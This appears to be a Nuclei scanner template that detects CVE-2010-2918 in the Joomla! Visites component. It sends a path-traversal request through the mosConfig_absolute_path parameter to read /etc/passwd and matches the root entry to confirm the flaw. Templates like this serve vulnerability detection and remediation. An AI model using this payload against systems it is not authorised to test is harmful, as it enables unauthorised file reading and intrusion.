35 lines
1.2 KiB
YAML
35 lines
1.2 KiB
YAML
id: CVE-2010-2918
|
|
|
|
info:
|
|
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/31708
|
|
- https://www.cvedetails.com/cve/CVE-2010-2918
|
|
- http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/
|
|
- https://www.exploit-db.com/exploits/14476
|
|
remediation: Upgrade to a supported version.
|
|
classification:
|
|
cve-id: CVE-2010-2918
|
|
tags: cve,cve2010,joomla,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/17
|